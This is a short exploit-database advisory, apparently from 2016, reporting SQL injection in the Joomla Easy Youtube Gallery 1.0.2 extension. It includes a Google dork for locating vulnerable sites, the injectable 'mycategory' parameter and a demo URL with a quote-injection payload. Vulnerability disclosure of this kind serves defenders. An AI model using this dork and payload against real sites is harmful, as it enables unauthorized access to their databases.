Joomla Easy Youtube Gallery 1.0.2 - SQL Injection Vulnerability

2016-03-22
ID: 85018
CVE: None
Download vulnerable application: Download
######################
# Exploit Title :  Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory 
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
# 
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################
1-4-2 (www01)